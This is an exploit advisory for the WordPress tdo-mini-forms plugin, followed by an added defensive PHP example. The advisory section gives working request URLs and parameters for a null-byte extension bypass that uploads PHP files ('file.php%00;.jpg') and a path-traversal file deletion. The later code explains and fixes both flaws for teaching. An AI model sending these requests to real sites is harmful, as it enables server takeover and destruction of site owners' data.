wordpress tdo-mini-forms plugin (rfu/rfd) Vulnerabilities
------------------------------------------------------------
wordpress tdo-mini-forms plugin (remote file upload/remote file deletion) Vulnerabilities

Author : Cold z3ro , www.hackteach.org , www.s3curi7y.com
Anonymous => You are the man

# Remote file upload :

wordpress/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=

file extension : file.php%00;.jpg
uploaded path : wordpress/wp-content/uploads/tdomf/tmp/$tdomf_form_id(value)/$user_agent(IP)/$filename.PHP%00;.jpg
Example of uploaded path : wordpress/wp-content/uploads/tdomf/tmp/1/127.0.0.1/z3ro.PHP%00;.jpg

# Remote file Deletion =>

Note : using any HTTP POST header modifier.

tdomf_form_id = 1;
deletefile[] = 1;
filepath = $variable ( wp-content/uploads/tdomf/tmp/1/127.0.0.1/z3ro.PHP%00;.jpg )
index = NULL

Example of result :
wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&deletefile[]=1&filepath=../../../wp-content/uploads/tdomf/tmp/1/127.0.0.1/z3ro.PHP%00;.jpg&index=

Eof;
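The two weaknesses described above share a root cause: the upload check looks only at the text after the last dot (so a name carrying a NUL byte and a second extension passes), and the deletion code takes the file path straight from the request (so `../` segments reach the filesystem). The following is an added defensive example, not code from the tdo-mini-forms plugin or from the advisory author: it shows the weak last-dot check next to a hardened name validator, and a delete-target builder that never takes a path from the client. `UPLOAD_ROOT`, `ALLOWED_EXT` and all function names are hypothetical; the sample inputs are constructed from the names shown in the advisory.

```php
<?php
// Added defensive example; hypothetical constants and helpers, not plugin code.
const UPLOAD_ROOT = '/var/www/wordpress/wp-content/uploads/tdomf/tmp'; // assumed base dir
const ALLOWED_EXT = ['jpg', 'jpeg', 'png', 'gif'];                       // illustrative list

/**
 * Weak check of the kind that "file.php%00;.jpg" gets past: only the text
 * after the LAST dot is inspected, so the real extension is never seen.
 */
function weak_extension_check(string $name): bool
{
    $dot = strrpos($name, '.');
    if ($dot === false) {
        return false;
    }
    $ext = strtolower(substr($name, $dot + 1));
    return in_array($ext, ALLOWED_EXT, true);
}

/**
 * Hardened check: refuse NUL bytes, control characters, path separators and
 * ';' outright, then require exactly one "base.ext" pair so stacked
 * extensions such as "x.php.jpg" are rejected rather than interpreted.
 */
function is_safe_upload_name(string $name): bool
{
    if (preg_match('~[\x00-\x1f\x7f/\\\\;]~', $name)) {
        return false;
    }
    if (!preg_match('/^([A-Za-z0-9_-]{1,64})\.([A-Za-z0-9]{1,5})$/', $name, $m)) {
        return false;
    }
    return in_array(strtolower($m[2]), ALLOWED_EXT, true);
}

/**
 * Build the delete target from server-validated pieces. The client may name
 * a file, but never a path: form id must be numeric, the directory component
 * must be a real IP, and the file name must pass the hardened check. A
 * request carrying "../../../..." therefore never reaches unlink().
 */
function resolve_delete_target(string $formId, string $clientIp, string $name): ?string
{
    if (!preg_match('/^\d{1,10}$/', $formId)) {
        return null;
    }
    if (filter_var($clientIp, FILTER_VALIDATE_IP) === false) {
        return null;
    }
    if (!is_safe_upload_name($name)) {
        return null;
    }
    return UPLOAD_ROOT . '/' . $formId . '/' . $clientIp . '/' . $name;
}

// Constructed inputs: the advisory's example name after URL decoding (a real
// NUL byte), the same name left encoded, a stacked extension, and a clean name.
$samples = [
    "z3ro.PHP\0;.jpg",
    'z3ro.PHP%00;.jpg',
    'photo.php.jpg',
    'photo.jpg',
];
foreach ($samples as $s) {
    printf("%-24s weak=%-6s hardened=%s\n",
        addcslashes($s, "\0..\37"),
        weak_extension_check($s) ? 'accept' : 'reject',
        is_safe_upload_name($s) ? 'accept' : 'reject');
}

// Deletion: a traversal path is refused; a validated name resolves under the root.
var_dump(resolve_delete_target('1', '127.0.0.1', '../../../wp-content/uploads/tdomf/tmp/1/127.0.0.1/z3ro.PHP'));
var_dump(resolve_delete_target('1', '127.0.0.1', 'photo.jpg'));
```

The weak check accepts the first three sample names and the hardened check accepts only `photo.jpg`; the traversal delete request yields `NULL` while the clean name resolves to a path beneath `UPLOAD_ROOT`. In a real plugin the resolved path would still be passed through `realpath()` and compared against the root before `unlink()`, as a second line of defence against symlinks inside the upload tree.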